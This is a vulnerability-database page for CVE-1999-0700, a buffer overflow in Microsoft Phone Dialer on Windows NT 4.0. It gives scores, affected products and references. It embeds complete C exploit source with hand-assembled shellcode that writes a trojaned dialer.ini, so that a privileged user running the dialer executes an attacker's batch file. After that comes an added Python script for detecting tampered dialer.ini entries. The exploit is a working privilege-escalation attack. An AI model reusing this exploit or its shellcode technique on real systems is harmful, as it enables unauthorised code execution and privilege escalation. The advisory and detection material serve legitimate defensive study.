CVE-1999-0700
CVSS 6.2
Published: 1999-07-29 00:00:00
Revised: 2008-09-09 00:00:00
NMCOE

[Original] Buffer overflow in Microsoft Phone Dialer (dialer.exe), via a malformed dialer entry in the dialer.ini file.


[CNNVD] Microsoft Phone Dialer (dialer.exe) buffer overflow vulnerability (CNNVD-199907-035)

A buffer overflow vulnerability exists in Microsoft Phone Dialer (dialer.exe). It is triggered by a malformed dialer entry in the dialer.ini file.

- CVSS (base score)

CVSS score: 6.2 [MEDIUM]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause complete system downtime]
Access complexity: HIGH [exploitation requires specific access conditions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_2000 Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0:sp3 Microsoft Windows NT 4.0 SP3
cpe:/o:microsoft:windows_nt:4.0:sp1 Microsoft Windows NT 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp4 Microsoft Windows NT 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0 Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_nt:4.0:sp2 Microsoft Windows NT 4.0 SP2
cpe:/o:microsoft:windows_nt Microsoft Windows NT

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0700
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0700
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-035
(official data source) CNNVD

- Other links and resources

http://www.microsoft.com/technet/security/bulletin/ms99-026.mspx
(UNKNOWN)  MS  MS99-026
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q237185
(UNKNOWN)  MSKB  Q237185

- Vulnerability information

Microsoft Phone Dialer (dialer.exe) buffer overflow vulnerability
Medium severity | Buffer overflow
1999-07-29 00:00:00 2006-04-19 00:00:00
Local
A buffer overflow vulnerability exists in Microsoft Phone Dialer (dialer.exe). It is triggered by a malformed dialer entry in the dialer.ini file.

- Advisories and patches


- Exploit information (19440)

Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability (EDBID:19440)
windows local
1999-07-30 Verified
0 David Litchfield
N/A
source: http://www.securityfocus.com/bid/554/info

Dialer.exe has an unchecked buffer in the part of the program that reads dialer entries from %systemroot%\dialer.ini. A specially-formed entry could cause arbitrary code to be run on the machine. By default, the %systemroot% folder is world-writeable. Dialer.ini is Dialer runs in the security context of the user, so an attacker would have to have a higher authority user dial the entry to gain any escalated privileges.

The following code will create a trojaned dialer.ini file that, when read in by dialer, will cause it to run a batch file called code.bat - this is hidden from the desktop by calling the equivalent of WinExec("code.bat",0); - and then ExitProcess(0); is called to shut up dialer.exe. Once the dialer.ini has been trojaned the attacker would create a batch file called code.bat and place in there any commands they wished to be run. Needless to say, if a user with admin rights runs dialer, any commands placed in this batch file are likely to succeed.

#include <stdio.h>
#include <windows.h>

int main(void)
{
    FILE *fd;
    char ExploitCode[256];
    int count = 0;
    const int PayloadLen = 145;   // bytes 0..144 below are the payload

    // NOP sled: the first 100 bytes are 0x90 so any landing point in this
    // region slides forward into the real payload
    while (count < 100)
    {
        ExploitCode[count] = 0x90;
        count++;
    }

    // ExploitCode[100] to ExploitCode[103] overwrites the real return address
    // with 0x77F327E5 which contains a "jmp esp" instruction taking us back
    // to our payload of exploit code (address is specific to NT 4.0 SP4)
    ExploitCode[100] = 0xE5;
    ExploitCode[101] = 0x27;
    ExploitCode[102] = 0xF3;
    ExploitCode[103] = 0x77;

    // procedure prologue - push ebp / mov ebp,esp (55 8B EC)
    ExploitCode[104] = 0x55;
    ExploitCode[105] = 0x8B;
    ExploitCode[106] = 0xEC;

    // mov eax,0x77F1A9DA - this moves into the eax register the address where
    // WinExec() is found in kernel32.dll. The address has been hard-coded in
    // to save room rather than going through LoadLibrary() and
    // GetProcAddress() to get the address - since we've already hard-coded in
    // the return address from kernel32.dll there seems no harm in doing this
    ExploitCode[107] = 0xB8;
    ExploitCode[108] = 0xDA;
    ExploitCode[109] = 0xA9;
    ExploitCode[110] = 0xF1;
    ExploitCode[111] = 0x77;

    // We need some NULLs to terminate a string - to do this we xor the esi
    // register with itself - xor esi,esi
    ExploitCode[112] = 0x33;
    ExploitCode[113] = 0xF6;

    // These NULLs are then pushed onto the stack - push esi
    ExploitCode[114] = 0x56;

    // Now the name of the batch file to be run is pushed onto the stack.
    // We'll let WinExec() pick up the file - push imm32 of the little-endian
    // bytes ".bat" (so the stack reads "tab." backwards, i.e. ".bat")
    ExploitCode[115] = 0x68;
    ExploitCode[116] = 0x2E;
    ExploitCode[117] = 0x62;
    ExploitCode[118] = 0x61;
    ExploitCode[119] = 0x74;

    // And now we push on "code" (together with the above: "code.bat\0")
    ExploitCode[120] = 0x68;
    ExploitCode[121] = 0x63;
    ExploitCode[122] = 0x6F;
    ExploitCode[123] = 0x64;
    ExploitCode[124] = 0x65;

    // We push esi (our NULLs) again - this is the uCmdShow argument WinExec()
    // uses to decide whether to display a window on the desktop or not - in
    // this case it will not
    ExploitCode[125] = 0x56;

    // lea edi,[ebp-0Ch] - the address of the "c" of code.bat is loaded into
    // the edi register; this becomes a pointer to the name of what we want
    // to tell WinExec() to run
    ExploitCode[126] = 0x8D;
    ExploitCode[127] = 0x7D;
    ExploitCode[128] = 0xF4;

    // This is then pushed onto the stack - push edi
    ExploitCode[129] = 0x57;

    // With everything primed we then call WinExec() - call eax - this will
    // then run code.bat
    ExploitCode[130] = 0xFF;
    ExploitCode[131] = 0xD0;

    // With the batch file running we then call ExitProcess() to stop
    // dialer.exe from churning out an Access Violation message - first the
    // procedure prologue push ebp and mov ebp,esp
    ExploitCode[132] = 0x55;
    ExploitCode[133] = 0x8B;
    ExploitCode[134] = 0xEC;

    // We need to give ExitProcess() an exit code - we'll give it 0 to use -
    // we need some NULLs then - xor esi,esi
    ExploitCode[135] = 0x33;
    ExploitCode[136] = 0xF6;

    // and we need them on the stack - push esi
    ExploitCode[137] = 0x56;

    // Now we mov the address for ExitProcess() into the eax register - again
    // we hard-code this in, tying this exploit to NT 4.0 SP4
    ExploitCode[138] = 0xB8;
    ExploitCode[139] = 0xE6;
    ExploitCode[140] = 0x9F;
    ExploitCode[141] = 0xF1;
    ExploitCode[142] = 0x77;

    // And then finally call it - call eax
    ExploitCode[143] = 0xFF;
    ExploitCode[144] = 0xD0;

    // Terminate the buffer so it is a valid C string (the payload itself
    // contains no NUL byte)
    ExploitCode[145] = 0x00;

    // Now to create the trojaned dialer.ini file
    fd = fopen("dialer.ini", "w+");
    if (fd == NULL)
    {
        printf("Couldn't create dialer.ini\n");
        return 1;
    }

    // Give dialer.exe what it needs from dialer.ini
    fprintf(fd, "[Preference]\nPreferred Line=148446\nPreferred Address=0\n"
                "Main Window Left/Top=489, 173\n[Last dialed numbers]\nLast dialed 1=");

    // And inject our exploit code as raw bytes (written with an explicit
    // length rather than as a format string)
    fwrite(ExploitCode, 1, PayloadLen, fd);

    fclose(fd);
    return 0;
}
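The report above says the overflow is reached through an overlong "Last dialed" entry in dialer.ini, and the published exploit places its overwritten return address at byte offset 100 of that entry. A defender who wants to check a %systemroot%\dialer.ini for tampering can therefore look for dial-string entries that are implausibly long or contain bytes no phone number would. The following audit script is an added example written here for this page; it is not part of the original exploit or of any Microsoft tool. The 100-byte threshold is an assumption taken from the exploit layout, and the sample INI contents are constructed for the demonstration.

```python
import re
import sys
from typing import Dict, List, Tuple

# Assumption: the published exploit overwrites the saved return address at
# byte offset 100 of the entry, so any entry that long is worth a look.
MAX_SANE_ENTRY_LEN = 100

# Characters a legitimate dialer entry would contain: digits, dial-string
# modifiers (# * + ,), separators and letters. Anything else is flagged.
SANE_CHARS = re.compile(r"^[0-9A-Za-z#*+,()\- .]*$")


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser returning {section: {key: value}} with raw values."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def audit_dialer_ini(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, reason) for every suspicious 'Last dialed' entry."""
    findings: List[Tuple[str, str, str]] = []
    for section, entries in parse_ini(text).items():
        if section.lower() != "last dialed numbers":
            continue
        for key, value in entries.items():
            if not key.lower().startswith("last dialed"):
                continue
            raw = value.encode("latin-1", errors="replace")
            if len(raw) >= MAX_SANE_ENTRY_LEN:
                findings.append((section, key,
                                 f"entry is {len(raw)} bytes, >= {MAX_SANE_ENTRY_LEN}"))
            elif not SANE_CHARS.match(value):
                findings.append((section, key,
                                 "entry contains characters not used in a dial string"))
    return findings


# Constructed sample: a normal dialer.ini with two ordinary numbers.
CLEAN_INI = """[Preference]
Preferred Line=148446
Preferred Address=0
[Last dialed numbers]
Last dialed 1=555-0100
Last dialed 2=9,1 (555) 0199
"""

# Constructed stand-in for a tampered file: an overlong entry of filler
# bytes (no real payload), long enough to reach the return-address slot.
SUSPECT_INI = "[Last dialed numbers]\nLast dialed 1=" + "\x90" * 110 + "\n"


if __name__ == "__main__":
    # Usage: python audit_dialer_ini.py C:\WINNT\dialer.ini
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, encoding="latin-1").read() if path else SUSPECT_INI
    for section, key, reason in audit_dialer_ini(data):
        print(f"[{section}] {key}: {reason}")
```

The file is read as latin-1 so that raw high bytes survive the decode instead of raising, and entries are checked for length before character content so that an oversized entry is reported once with the more telling reason.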


- Vulnerability information

7405
Microsoft Phone Dialer (dialer.exe) Dialer Entry Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

1999-07-29 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete